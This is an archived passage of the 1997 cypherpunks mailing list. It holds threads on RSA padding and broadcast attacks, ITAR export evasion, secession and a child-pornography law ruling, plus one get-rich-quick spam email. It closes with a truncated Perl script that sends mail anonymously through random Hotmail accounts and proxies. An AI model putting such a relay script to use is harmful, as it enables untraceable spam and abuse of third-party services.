   look as though he was a minor. Would you be breaking the law? A
   federal judge in San Francisco ruled yesterday you would be, rejecting
   a court challenge to a 1996 law banning computer-generated erotic
   images that "appear" to be of children.
   
        U.S. District Judge Samuel Conti ruled the adult film industry,
   which brought the suit and argued no simulated minors appear in
   movies, shouldn't feel threatened by the law. "Plaintiffs' products do
   not fall into these categories," he said in a 16-page decision that
   upheld the Child Pornography Prevention Act as constitutional.
   Plaintiffs challenged the law as vague and overbroad, saying it
   "criminalizes forms of expression in violation of the First and Fifth
   Amendments."
   
        But Conti skirted the more controversial question: What if
   someone did use Photoshop to synthesize images of half-naked children?
   Would that bit-twiddling violate the First Amendment's guarantees of
   freedom of speech? What about an anthropology professor's
   computer-generated movie of the sex play of South Pacific teens?
   
        "This ruling resolves nothing of consequence," says Eric
   Freedman, a constitutional law professor at Hofstra Law School. "The
   judge never reached the real problems of the statute. That'll have to
   wait for another lawsuit."

[...]
   







From ulf at fitug.de  Wed Aug 13 08:42:12 1997
From: ulf at fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Wed, 13 Aug 1997 23:42:12 +0800
Subject: journalism, travel and manufacturing
In-Reply-To: <199708131033.MAA00102@xs2.xs4all.nl>
Message-ID: <9708131534.AA14274@public.uni-hamburg.de>



> I kept one for myself.  That leaves one, which I originally 
> intended to snail mail to Dr. Dmitri M. Vulis, KOTM.  But if 
> you don't want it then I'll auction it off via cypherpunks.  

Anyone auctioning off one of those way cool C2Net t-shirts? They were
already out when I arrived at the cypherpunks tent at Saturday night,
and I desperately need one. :)






From nospam-seesignature at ceddec.com  Wed Aug 13 08:53:57 1997
From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com)
Date: Wed, 13 Aug 1997 23:53:57 +0800
Subject: Encrypting same data with many keys...
In-Reply-To: 
Message-ID: <97Aug13.114455edt.32260@brickwall.ceddec.com>



On Tue, 12 Aug 1997 amp at pobox.com wrote:

> > > What if instead of using a private key cypher, we used a public key
> > > cypher?  Would that make any difference in attack methods?
> > 
> > Yes.
> > 
> > Having identical plaintexts raised to the same power modulo different
> > numbers makes the solution much easier.  If you have enough RSA
> > encryptions of the same number to the same power, you can solve it
> > outright by the remainder theorem.
> 
> So would that then be a possible weakness in encrypting to multiple 
> recipients with PGP? Probably not, since the actual data is encrypted with 
> idea.

PGP uses and E of 17 by default, but it would be a problem except that
there is a specification for random padding, so it *NEVER* encrypts
identical plaintext.  It always uses a number just a few bits shorter than 
N, starting with 0x02, then nonzero random bytes, then a zero byte, and
finally the message bytes you want to encrypt.

There was a man-in-the-middle or replay attack with SSL that they changed
the spec of the padding slightly (8 bytes before the zero byte must be
0x03), I think this is because you might be able to quickly find a random
cyphertext that decrypts to having a zero byte followed by something
useful as key material, but haven't read the details. 

--- reply to tzeruch - at - ceddec - dot - com ---






From sunder at brainlink.com  Wed Aug 13 08:57:37 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Wed, 13 Aug 1997 23:57:37 +0800
Subject: Encrypting same data with many keys...
In-Reply-To: 
Message-ID: 



On Tue, 12 Aug 1997 amp at pobox.com wrote:

> So would that then be a possible weakness in encrypting to multiple 
> recipients with PGP? Probably not, since the actual data is encrypted with 
> idea.

Welp, since the RSA (or now DH) is used to encrypt a random session key
it's not an issue (from what other replies I've seen.)  Right?


=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From nospam-seesignature at ceddec.com  Wed Aug 13 08:58:25 1997
From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com)
Date: Wed, 13 Aug 1997 23:58:25 +0800
Subject: A peculiar notion
In-Reply-To: 
Message-ID: <97Aug13.114449edt.32258@brickwall.ceddec.com>



On Tue, 12 Aug 1997, Michael Froomkin - U.Miami School of Law wrote:

> On Tue, 12 Aug 1997, Steve Schear wrote:
> 
> > So, if the people (legal voters in the states which planned to withdraw)
> 
> No, "the people" is the people of the united states as a whole.  The
> federalist papers deals with this somewhere, where they explain that of
> course the voting had to be organized state by state, because that tracked
> the reality of how everything was organized, but nonetheless it was
> intended to be a national pleblecite to produce a national government.

Someone should tell the U.K. - I don't remember "A plebecite among all
members of a political collective is necessary to sever a single member" 
as being one of the self-evident truths in the Declaration of
Independence.  After all, the parliment said they really did represent the
colonies, so their votes count, and anything that happened in Philadelphia
should have no legal force.

Jefferson suggested a new convention every 20 years with the argument that
you cannot morally bind a new generation to an old structure - they
probably would not change it much, but personal assent gives moral
authority.  Even the abolitionists considered it tyranny when the
constitution gave legal force to the fugitive slave laws.

What do you do when a piece of paper is used to justify continuing
usurpations - and that same paper created the body of an earlier document
which was the spirit of liberty and declared the ephemeral English law and
its executive no longer in force because of such usurpations?  When the
spirit leaves a body, that body is called a corpse.  And the Constitution
is a dead letter if the spirit of the Declaration is missing.  When legal
authorities crawl over it looking for loopholes to impose more federal
power, it is not merely dead, but an undead vampire seeking to devour the
spirit of liberty.  The constitution, and the law in general is alive and
in robust health only when it is acting to preserve and increase liberty.

It would have been interesting to see what would have happened if someone
actually put the issue of secession to a vote - many northerners wanted
the south to leave.  But the chances of Lincoln and the Congress calling
such a vote were less than that of King George III calling a similar vote
on our earlier situation. 

Eventually every state ratified the constitution, though they had to
threaten Rhode Island.  It would have been more interesting if a few the
larger states didn't ratify and held out after the "required" number were
met.

If the southern states "didn't do it right", what is the right way to
seceed from the united states?  And can it be done when the leadership is
acting as tyrants?

--- reply to tzeruch - at - ceddec - dot - com ---






From aba at dcs.ex.ac.uk  Wed Aug 13 09:13:07 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Thu, 14 Aug 1997 00:13:07 +0800
Subject: ANNOUNCE: mailing list for Eternity Service developers/users
Message-ID: <199708131536.QAA04802@server.test.net>




Laszlo Vecsey  has setup a mailing list for
users and developers of the eternity service.  

On topic will be development, design of improved protocols, also
design of a general distributed file system (DFS or worldFS) which
some are interested to implement based on Ross Anderson's paper `The
Eternity Service', plus issuses surrounding being an eternity
operator.

The mailing list address is "eternity at internexus.net", to subscribe
send a mail to "majordomo at internexus.net" with body:

	subscribe eternity

To submit articles to the mailing list send them to
"eternity at internexus.net".

Adam






From paul at fatmans.demon.co.uk  Wed Aug 13 10:05:59 1997
From: paul at fatmans.demon.co.uk (Paul Bradley)
Date: Thu, 14 Aug 1997 01:05:59 +0800
Subject: Guy Polis
In-Reply-To: <4FoBBe4w165w@bwalk.dm.com>
Message-ID: 





> > drunken rants are one thing, and are easily deleted, but impersonating me
> > is straight out of Detweiler's book. Must be something about Cypherpunks
> > that brings out this urge to impersonate.
> 
> Toto's drunked rants and the most valuable traffic on this mailing list
> these days - I read them and usually save them.  Tim May's censorship
> rants make him sonnd like kent Krispin.

I agree, Toto makes some of the best posts to the list, they are often 
just humurous one-liners but he also makes a lot of excellent 
observations and is very good at predicting the way things will go, as 
far as I`m concerned his posts are up there in quality with those of TCM, 
Adam Back, Dr.V, Bill Stwart, William Geiger and the other regular good 
posters.

> How do we know that Tim May didn't post the alleged forgery himself
> and didn't munge the headers to point to Toto?

Not his style (as far as I know it), but I agree there is no evidence to the 
contrary.

        Datacomms Technologies data security
       Paul Bradley, Paul at fatmans.demon.co.uk
  Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"






From kent at songbird.com  Wed Aug 13 11:28:17 1997
From: kent at songbird.com (Kent Crispin)
Date: Thu, 14 Aug 1997 02:28:17 +0800
Subject: A peculiar notion
In-Reply-To: 
Message-ID: <19970813111221.19398@bywater.songbird.com>



On Wed, Aug 13, 1997 at 11:00:35AM -0400, nospam-seesignature at ceddec.com wrote:
[...]
> 
> If the southern states "didn't do it right", what is the right way to
> seceed from the united states?  And can it be done when the leadership is
> acting as tyrants?

You might find

	http://www.hawaii-nation.org

an interesting site...

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From enoch at zipcon.net  Wed Aug 13 12:15:56 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Thu, 14 Aug 1997 03:15:56 +0800
Subject: "Leotards and the Law," morphed child porn lawsuit, from Netly
In-Reply-To: 
Message-ID: <19970813190543.25186.qmail@zipcon.net>



Declan writes:

>         Take an erotic photo of an adult and alter it in Photoshop to
>    look as though he was a minor. Would you be breaking the law? A
>    federal judge in San Francisco ruled yesterday you would be, rejecting
>    a court challenge to a 1996 law banning computer-generated erotic
>    images that "appear" to be of children.

1930's:  "Actung Juden!"
1950's:  "Actung Communists!"
1990's:  "Actung Photoshop Users!"

Of course this is just another example of how quickly the Constitution can
be made to evaporate when the Mantra "Society's Overwhelming Interests" is
recited in the courtroom.  Often over silly thought-control type issues
like this one. 

It won't be long before "Society's Overwhelming Interest" to Protect the
Little Children(tm) bans not only simulated visual material, but any
juxtiposition of English words which might suggest that anyone under the
age of 18 in the past, present, or future, has had even the slightest
inkling of a sexual thought or feeling.  Said laws of course being
absolutely necessary to prevent bad ideas from being used by clever
predators to break down innocence and purity and reduce all children to
sexually aroused putty in the hands of professional sex criminals.

I wonder exactly how far child sex hysteria will be permitted to continue,
before rational people begin giggling loudly in the auditorium. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From sunder at brainlink.com  Wed Aug 13 12:18:05 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Thu, 14 Aug 1997 03:18:05 +0800
Subject: Encrypting same data with many keys...
In-Reply-To: <97Aug13.114455edt.32260@brickwall.ceddec.com>
Message-ID: 



On Wed, 13 Aug 1997 nospam-seesignature at ceddec.com wrote:

> PGP uses and E of 17 by default, but it would be a problem except that
> there is a specification for random padding, so it *NEVER* encrypts
> identical plaintext.  It always uses a number just a few bits shorter than 
> N, starting with 0x02, then nonzero random bytes, then a zero byte, and
> finally the message bytes you want to encrypt.
> 
> There was a man-in-the-middle or replay attack with SSL that they changed
> the spec of the padding slightly (8 bytes before the zero byte must be
> 0x03), I think this is because you might be able to quickly find a random
> cyphertext that decrypts to having a zero byte followed by something
> useful as key material, but haven't read the details. 

In terms of padding does it matter WHERE I put the padding info?  Is it
better to put random stuff in the front or at the end?  The reason I ask,
say that you're going to encrypt an N byte block where N is bigger than
your block cypher's key size?

If my intution is correct, and you have the same data encrypted with many
keys (even RSA) but have the padding at the end, the 1st block would still
be breakable.  I suppose putting the data at the end would also result in
the same kind of problem, though it might be a bit harder to attack than
putting the data 1st...

Would it not make sense to scatter the random padding throughout the
block?   How is this normally done?  Front?  Back?  Middle?  Scattered?


These are some of the same thought threads that I went through when I
designed WhiteNoiseStorm - (Do a net search for WNS210.ZIP for more info
on it.)  Basically, this cypher uses random block sizes called windows-
(it's more of a stream cypher at the input, but a block cypher at the
output) and mixes random noise with the data.  The bits it hides in the
ramdom noise source are scattered throughout the window AND encrypted.  It
turns out this is useful for stego use and that's what it turned into.
But this may be another use for it...

Since an attacker doesn't know the window size and since the window size
varries randomly from window to window, it's very hard for the attacker to
use known or chosen plaintext attacks.  If you encrypt the same data N
times, you get N different cyphertexts.

It's never been cryptanalized (far as I know - could be the spooks have
done so already) so its strength is unknown...  But I suppose using
something like WNS would be ideal for encrypting the same data with
different keys...

The big disadvantages though: you need a really good source for random
numbers and the size of the cyphertext is much much bigger than the
plaintext... anywhere between 1.5 to 10X depending on the security level
you chose. :)  (And it's a symmetric key cypher, CBC only...  If I can
figure out a way to turn it into a PK system, it would really be
usefull...) 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From dlv at bwalk.dm.com  Wed Aug 13 13:27:29 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 14 Aug 1997 04:27:29 +0800
Subject: journalism, travel and manufacturing
In-Reply-To: <9708131534.AA14274@public.uni-hamburg.de>
Message-ID: <0gyDBe3w165w@bwalk.dm.com>



ulf at fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=) writes:

> 
> > I kept one for myself.  That leaves one, which I originally 
> > intended to snail mail to Dr. Dmitri M. Vulis, KOTM.  But if 
> > you don't want it then I'll auction it off via cypherpunks.  
> 
> Anyone auctioning off one of those way cool C2Net t-shirts? They were
> already out when I arrived at the cypherpunks tent at Saturday night,
> and I desperately need one. :)
> 
A T-shirt saying, "I got barratrous threats from C2Net's shysters after a
C2Net employee squelched my attempt to discuss the security flows in their
product"?  I'd like one too, thank you.


---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From sunder at brainlink.com  Wed Aug 13 13:32:48 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Thu, 14 Aug 1997 04:32:48 +0800
Subject: Fuck the usenet cabal
In-Reply-To: 
Message-ID: 



On Wed, 13 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

> What if a non-US person paid them $40 to spam people outside the U.S.
> with strong crypto?
> 
> Is it possible to stuff a blatant ITAR violation into about 100 lines of ascii?

Already been done.  RSA in 4 lines of Perl, etc...  Heck there was even a
site out that that cut a UUENCODED copy of PGP into many bits and asked
people to grab one of the bits to use as their signature.  I.e. Part 50
out of N of PGP, etc...  Someone with huge usenet archives (or cd's) could
search for all of these outside of the USA and put them together into the
whole. :)  No need to pay someone $40 to spam when people will freely do
this.

You could also take a packet radio modem and spam short wave (or
whatever packet radio uses or can use that can get outside the usa) and
send PGP that way if you like.  Or take PGP, uuencode it and fax it
outside of the USA.  Or feed it through a voice synth and read it to
a foreign phone number that has a voice decoder, or compose it as a
MIDI song as Kent suggested and broadcast the song...  Or tatoo it on your
ass then when you visit russia have someone take a picture. :)  (Though
you might then be arrested in russia for porno or whatever the laws are
there, heheheheh....)

Don't even need to use the internet to piss off the feds. :)

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From FreedomFound at t-1net.com  Thu Aug 14 04:32:51 1997
From: FreedomFound at t-1net.com (FreedomFound at t-1net.com)
Date: Thu, 14 Aug 1997 04:32:51 -0700 (PDT)
Subject: ?????
Message-ID: <199708141130.GAA18690@quick.we-deliver.net>



Hello,
If You Qualify, You Could Net
 Yourself Well Over $150,000
 By The End Of 1997... Guaranteed!

 Greetings:
We are Dale and Gwen Yancy.
 We would like to ask you to please take 
 two minutes of you time to read the following. If you
 don't like what you see then please trash this mail and
 except our apologies for this disturbance. We promise
 you we will not send you another. We are writing to
 introduce you to a strong, wealth building home based
 business that is NOT a Multilevel Marketing venture or
 some get "rich quick scheme"... a business that is more
 profitable than any network marketing, direct sales,
 franchise or investment opportunity in existence today.

 Who Will Be Allowed To Work With Us?

 We are looking for a limited group of serious minded
 entrepreneurs that have been looking for a solid
 business opportunity. We are not looking for a huge
 response. We only want to work with people we feel have
 a "burning desire" to be successful. Can you visualize
 yourself earning $30,000 + net per month within the
 next year, if provided with the right opportunity to
 do so? Are you willing to commit to doing whatever it
 would take to be successful in this business once you
 completely understand it?

 How To Find Out If You Qualify

 To find out more, call toll free for more details:
 1-800-322-6169 Ext. 0650. This is a recorded message
 that is available 24 hours a day. It is NOT a telemarketer.
 If you are seriously interested...REPLY NOW! If you don't really feel
 you've got the right stuff to be successful, then
 please don't bother to respond. We only want to work
 with the motivated people who seriously want to make
 insane amounts of money!

 Again, if we have reached you in error, please send mail with REMOVE in the subject.
You will be immediately removed from any subsequent mailings. 
 Prosperous Regards,
Dale and Gwen Yancy

 P.S. Once again, this is NOT MLM. Serious inquiries only please! 

         1-800-322-6169  EXT 0650  DAY OR NIGHT













From sunder at brainlink.com  Wed Aug 13 14:00:42 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Thu, 14 Aug 1997 05:00:42 +0800
Subject: Memme: Crypto=Bullet Proof Vests
Message-ID: 



I came up with this while on a bio break....

ITAR classifies crypto as munitions, but this is the same thing as telling
someone who wishes to travel to a warring country that they may not buy a
bullet proof vest, but they may buy an vest that will stop pebbles being
thrown at them.  This is equivalently reasoned that such vests could be
used to rob banks and the theives could get away from the police - but how
many bank theives have you known that were shot by the cops and not caught
by other means?

It believes that only the USA has bullet proof vests and it is a matter of
national security that no one else have bullet proof vests.  These aren't
tactical weapons equivalent to 20MegaTon nukes, these are devices that
help save lives.  Meanwhile other countries have also created bullet proof
vests, some that protect against high velocity bullets.

We can understand that vest piercing bullets kill policemen and that they
are reasonably outlawed, but if someone built a vest that would stop those
we wouldn't be able to mail them to those fighting for democracy outside
of the USA.

In the case of crypto, crypto is a tool that saves your privacy.  Why are
we not allowed to have the ability to ship the tools needed to help
protect privacy of say the students in China (for example) where any
suspicion of disidence would be instantly punishable by death.

For a country that is intent on making the world safe for democracy,
we are sure doing a very bad job.

Sure, a bullet proof vest can be used to protect a pornographer or a
terrorist, but it will also save the lives of citizens, freedom fighters
and children.  How many parents who live in bad neighborhoods would object
to their kids being able to wear bullet proof vests, could they afford
them, while going to school?

The recent bills thrown around in congress are attempting to do the
equivalent of outlawing bullet proof vests, and only allowing pebble proof
vests to be sold, or bullet proof vests that can be pierced by police.
Would you want your kid to wear a vest that can be pierced by police fire?
Maybe a stray bullet aimed at a drug dealer hitting your kid?   Or maybe a
criminal getting their hands on the same type of ammo and shooting your
kid?  We need our kids to wear Strong Bullet Proof vests!

Next time they yell "But if it saves the life of one child" give them
this.  "But if strong crypto can save the life of one child
freedomfighter, who are we to limit its use?  Support strong crypto and
protect the kids of the world!"

(Preaching to the choire of course, but who knows maybe the crypto=bullet
proof vest arguement will be useful to someone who can talk sense into the
crypto clueless cognresscritters.)

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From sunder at brainlink.com  Wed Aug 13 14:16:00 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Thu, 14 Aug 1997 05:16:00 +0800
Subject: Encrypting same data with many keys...
In-Reply-To: <3.0.2.32.19970813003535.0068e9b4@popd.ix.netcom.com>
Message-ID: 



On Wed, 13 Aug 1997, Bill Stewart wrote:

> The actual data is encrypted with IDEA, but the identical IDEA key is 
> encrypted with each recipient's RSA key.  To avoid this attack,
> PGP uses random padding after the IDEA key (which makes the message
> encrypted with RSA different for each recipient, avoiding the trap.
> Since IDEA keys are 128 bits long, and RSA moduli are typically 384-2047,
> there's plenty of room for random noise in the format.)

Would it not be more secure if it picked a different IDEA session key for
each recipient?  Would be slower, but...

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From sunder at brainlink.com  Wed Aug 13 14:19:27 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Thu, 14 Aug 1997 05:19:27 +0800
Subject: Fuck the usenet cabal
In-Reply-To: <87scBe10w165w@bwalk.dm.com>
Message-ID: 



On Tue, 12 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

> (An autoresponder is an address at cyberpromo.com to which you can send an
> e-mail and get back a pre-recorded response, if your site accepts e-mail
> from cyberpromo.  Supposedly anyone can set one of them up for free
> and provide their own automatic response. Stanford is running a promotion.)
> 
> Now, suppose some non-US person sets up an auto-responder that sends out
> strong crypto software, and another non-US person requests it and gets it.
> 
> Is anyone going to be guilty of ITAR violations?

Nice idea Doc, but anyone who goes there you can bet will have their email
address added to spamfords databases, and they'll also get loads of spam
in addition to the crypto you wish to export.  :)  Let's not make deals
with the devil.  (Still if the guy on the other side is smart enough to
get a temporary demo account, you're on to a good idea.)

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From sunder at brainlink.com  Wed Aug 13 14:24:56 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Thu, 14 Aug 1997 05:24:56 +0800
Subject: [NTSEC] Hotfixes  (fwd)
Message-ID: 



Wheee, check this out... there's thing called a Download Wizard that
"offers suggested updates" for software on your hard drive... Now buys and
girls, can we guess what else it will do? i.e. give to Microsoft a list
of? Hrrmmm?

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================

---------- Forwarded message ----------
Date: Wed, 13 Aug 1997 01:00:48 -0400
From: "Donald M. Barnard Jr." 
To: "ntsecurity at iss.net" 
Subject: RE: [NTSEC] Hotfixes 

Meanwhile MS gets a nice database of installed software?

Don

-----Original Message-----
From:	Paul Leach [SMTP:paulle at microsoft.com]
Sent:	Tuesday, August 12, 1997 12:56 PM
To:	'Russ'
Cc:	ntsecurity at iss.net
Subject:	RE: [NTSEC] Hotfixes 

As it says on the page you refer to:

The Download Wizard will now check your computer for exisiting Microsoft
software files and make suggestions for file updates that may be
appropriate for your computer's configuration. The Download Wizard will
NOT automatically change, add, or delete any files on your computer. You
will be given the choice to download and install each of these files
yourself. Important: Before downloading any files, be sure to check with
your system administrator. 

I.e., we make it easy to find out if there are updates that _may_ apply
to you (and screen out lots that for sure _don't_) -- you still have to
decide if you want them.

The backend for this is pretty heavyweight and labor intensive -- it's
not ready to be a product.

ZAW is the product that is supposed to support automation of admin of
workstation and servers in a corporate environment.

> ----------
> From: 	Russ[SMTP:Russ.Cooper at rc.on.ca]
> Sent: 	Tuesday, August 12, 1997 4:15 AM
> To: 	Paul Leach
> Cc: 	ntsecurity at iss.net
> Subject: 	RE: [NTSEC] Hotfixes 
> 
> Paul,
> 
> Can you then comment on the Download Wizard available from
> http://www.microsoft.com/kb/softlib/default.asp which supposedly
> detects
> which files/patches etc... you need and automates the installation of
> these? I haven't tried it with a machine that was "Ok" in its eyes, so
> I
> haven't seen what it actually does, but the concept is quite cool for
> Intranet server management. Would seem to be parts of SMS for
> Intranets,
> which despite having risks that would have to be managed, could
> seriously improve the remote configuration management of machines.
> 
> Can you get someone to comment for us as to precisely what it does and
> how it does it? Is the underlying dB available with some instructions
> on
> how we might modify it for our own use?
> 
> I'm asking on behalf of the list because I think this would seem to be
> the answer to this thread's questions.
> 
> Cheers,
> Russ
> R.C. Consulting, Inc. - NT/Internet Security
> owner of the NTBugTraq mailing list: http://www.ntbugtraq.com
> 







From nospam-seesignature at ceddec.com  Wed Aug 13 14:36:30 1997
From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com)
Date: Thu, 14 Aug 1997 05:36:30 +0800
Subject: Encrypting same data with many keys...
In-Reply-To: 
Message-ID: <97Aug13.172635edt.32257@brickwall.ceddec.com>



On Wed, 13 Aug 1997, Ray Arachelian wrote:

> On Wed, 13 Aug 1997 nospam-seesignature at ceddec.com wrote:
> 
> In terms of padding does it matter WHERE I put the padding info?  Is it
> better to put random stuff in the front or at the end?  The reason I ask,
> say that you're going to encrypt an N byte block where N is bigger than
> your block cypher's key size?
> 
> If my intution is correct, and you have the same data encrypted with many
> keys (even RSA) but have the padding at the end, the 1st block would still
> be breakable.  I suppose putting the data at the end would also result in
> the same kind of problem, though it might be a bit harder to attack than
> putting the data 1st...
> 
> Would it not make sense to scatter the random padding throughout the
> block?   How is this normally done?  Front?  Back?  Middle?  Scattered?

The location does not matter.  The standard RSA libs place the padding at
the front - it is one of those PKCS specifications.

You would simply need to break the conventional key down to a few bytes
smaller than the modulus size, so each would be padded with a few random
bytes.

--- reply to tzeruch - at - ceddec - dot - com ---






From alan at ctrl-alt-del.com  Wed Aug 13 15:51:33 1997
From: alan at ctrl-alt-del.com (Alan)
Date: Thu, 14 Aug 1997 06:51:33 +0800
Subject: Encrypting same data with many keys...
In-Reply-To: <97Aug13.172635edt.32257@brickwall.ceddec.com>
Message-ID: 



On Wed, 13 Aug 1997 nospam-seesignature at ceddec.com wrote:

> > Would it not make sense to scatter the random padding throughout the
> > block?   How is this normally done?  Front?  Back?  Middle?  Scattered?
> 
> The location does not matter.  The standard RSA libs place the padding at
> the front - it is one of those PKCS specifications.

Actually it does matter.  At the front is best with a chaining cypher.
(The random padding will cascade down through the rest of the data.)  With
adding it on the end, given all other factors being the same, the data
before the random padding will be the same as well.

alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.






From iang at cs.berkeley.edu  Wed Aug 13 15:55:43 1997
From: iang at cs.berkeley.edu (Ian Goldberg)
Date: Thu, 14 Aug 1997 06:55:43 +0800
Subject: sendhotmail, version 1.3
In-Reply-To: <19970807192254.40.qmail@zipcon.net>
Message-ID: <5stde6$tdc$1@abraham.cs.berkeley.edu>



And here's 1.3.  It uses the same config file as 1.2.

New:

o fixes a bug involving + in email addresses
o handles continuation headers properly
o Can be used as a drop-in replacement for sendmail (though it may get confused
  if you pass weird sendmail options); it will keep trying random hotmail
  accounts and proxies until it succeeds in delivering the mail.  Note that,
  depending on your connectivity, this can take a while...

   - Ian

#!/usr/bin/perl -w

##
## sendhotmail: pipe an RFC822 mail message into this, and it will send it
##              out from a hotmail account via an HTTP proxy
##
## Version 1.3: 19970813
##
## Program by Ian Goldberg 
##

sub Usage {
    die "Usage: $0 -t | addr\@host ...\n";
}

## Check options
$cmdlineto = '';
while ($#ARGV >= 0 && $ARGV[0] =~ /^-/o) {
    $_ = shift @ARGV;
    if ($_ eq "-t") {
	$cmdlineto = '';
    } elsif ($_ eq "-f") {
	shift @ARGV;
    } else {
	## Ignore option
    }
}
if ($#ARGV >= 0) {
    $cmdlineto = join(", ", @ARGV);
}

use LWP;

$uadirect = new LWP::UserAgent;

## The filename of the configuration file
$configfile = '/home/iang/sendhotmail/config';

## Read the config file
open(CONFIG, $configfile) or die "Cannot open $configfile: $!\n";
while() {
    next if /^\s*$/o;
    next if /^\s*\#/o;
    next unless /^([^:]+):\s*(.*)$/o;
    $value = $2;
    $name = "\L$1\E";
    $name =~ s/[^a-z0-9]//iog;
    $config{$name} = $value;
}
close(CONFIG);

sub escapetext {
    my $t = $_[0];
    $t =~ s/([\000-\037\200-\377\{\}\|\\\^\[\]\`\"\<\>\:\@\/\;\?\=\&\%\.\#\+])/"%".unpack('H2',$1)/eg;
    $t =~ s/ /+/g;
    $t;
}

sub getaddrs {
    my @addrlist = split(/,\s*/, $_[0]);
    my ($a, $ra);
    my @r;

    foreach $a (@addrlist) {
	$ra = '';
	if ($a =~ /\<(.*?)\>/) {
	    $ra = $1;
	} else {
	    $a =~ s/\(.*?\)//g;
	    $a =~ s/\".*?\"//g;
	    $ra = $1 if $a =~ /(\S+\@\S+)/;
	}
	push (@r, $ra) if $ra ne '';
    }
    join(', ', @r);
}

## Parse the incoming mail.  We need to put the To, Cc, and Bcc headers
## into a simple format that hotmail can understand.

$header{'to'} = '';
$header{'subject'} = '';
$header{'cc'} = '';
$header{'bcc'} = '';
$curheader = '';
while() {
    last if /^$/;
    chomp;
    if (/^\S/) {
	## Start a new header
	if (s/^To:\s*//io) {
	    $curheader = 'to';
	    $header{'to'} .= ', ' if $header{'to'} ne '';
	} elsif (s/^Cc:\s*//io) {
	    $curheader = 'cc';
	    $header{'cc'} .= ', ' if $header{'cc'} ne '';
	} elsif (s/^Bcc:\s*//io) {
	    $curheader = 'bcc';
	    $header{'bcc'} .= ', ' if $header{'bcc'} ne '';
	} elsif (s/^Subject:\s*//io) {
	    $curheader = 'subject';
	} else {
	    $curheader = '';
	}
    }
    if ($curheader ne '') {
	s/^\s*//;
